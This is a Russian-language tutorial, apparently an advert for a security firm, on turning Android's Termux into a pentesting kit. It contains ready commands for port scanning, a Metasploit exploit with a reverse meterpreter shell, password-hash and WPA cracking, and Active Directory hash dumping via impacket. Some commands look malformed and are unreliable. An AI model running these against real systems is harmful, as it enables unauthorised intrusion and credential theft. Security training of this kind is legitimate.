Termux – это эмулятор терминала и Linux‑окружения для Android, позволяющий запускать полноценные инструменты для тестирования безопасности прямо на мобильном устройстве. В статье рассмотрим, как подготовить Termux к работе, какие пакеты установить и какие практики использовать для эффективного мобильного пентеста.
Первичная настройка Termux
После установки приложения выполните базовое обновление и установку необходимых утилит:
pkg update && pkg upgrade
Установите git и curl – они понадобятся для загрузки скриптов и репозиториев:
pkg install git curl
Установка основных пакетов
Ниже представлен набор базовых пакетов, которые покрывают большинство задач мобильного пентеста:
nmap– сканирование сети и портов.masscan– быстрый сканер портов.nikto– проверка веб‑серверов.wapiti– веб‑вулн-сканер.metasploit– платформа для эксплуатации.searchsploit– локальная база эксплойтов.aircrack-ng– работа с Wi‑Fi.hashcatиjohn– крэкинг паролей.python(иpip) – написание скриптов.
Установить их можно одной командой:
pkg install nmap masscan nikto wapiti metasploit searchsploit aircrack-ng hashcat john python
Сканирование сети
nmap остаётся золотым стандартом для обнаружения открытых сервисов. Пример базового сканирования:
nmap -sS -p- -T4 192.168.1.0/24
Для ультра‑быстрого перебора портов удобно использовать masscan:
masscan 192.168.1.0/24 -p1-65535 --rate=10000
Веб‑вулн-сканирование
Для проверки веб‑приложений используем два инструмента:
nikto– быстрый аудит конфигурации сервера.wapiti– более глубокий поиск уязвимостей (XSS, SQLi и пр.).
# Nikto
nikto -h http://target.com
# Wapiti
wapiti -u http://target.com -e "xss,sqli,csrf"
Эксплуатация и пост‑эксплуатация
Самой мощной платформой является metasploit. После установки запустите консоль:
msfconsole
Пример базового воркфлоу:
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST
exploit
Для быстрого поиска известных эксплойтов по версии продукта удобно пользоваться searchsploit:
searchsploit apache 2.4.49
Крек паролей
Если в ходе теста вы получили хеши, их можно взломать локально. hashcat использует GPU‑ускорение, но в Termux он работает в CPU‑режиме:
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
Альтернатива – john:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hashes.txt
Работа с беспроводными сетями
Для анализа Wi‑Fi используйте aircrack-ng. Обычно в Termux требуется подключить внешний Wi‑Fi адаптер с поддержкой мониторинга:
# Перевести адаптер в режим мониторинга
airmon-ng start wlan0
# Снять захват пакетов
airodump-ng wlan0mon
# Попытка взлома WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b capture-01.cap
Скрипты и автоматизация
Благодаря установленному python и pip можно быстро разворачивать кастомные инструменты. Пример установки популярного фреймворка impacket:
pip install impacket
Далее можно использовать, например, python -m impacket.examples.secretsdump для получения хешей из AD.
Лучшие практики и безопасность
- Работайте в изолированных сессиях (
tmuxилиscreen) – в Termux их легко установить:pkg install tmux. - Не храните конфиденциальные файлы в открытом виде. Шифруйте результаты с помощью
gpg:
gpg -c results.txt
- Регулярно обновляйте пакеты:
pkg update && pkg upgrade. - При работе с публичными сетями используйте VPN или TOR (пакет
tor) для сокрытия исходного IP.
Заключение
Termux превращает Android‑устройство в полноценную платформу для мобильного пентеста. При правильной настройке и подборе инструментов вы можете проводить сканирование, эксплуатацию, крек паролей и анализ Wi‑Fi без необходимости переносить ноутбук.
Компания RybinskLab предлагает профессиональные услуги по мобильному пентесту, аудитам безопасности приложений и обучению персонала. Обращайтесь к нам за консультациями, подготовкой кастомных скриптов под Termux и полным сопровождением проектов по информационной безопасности.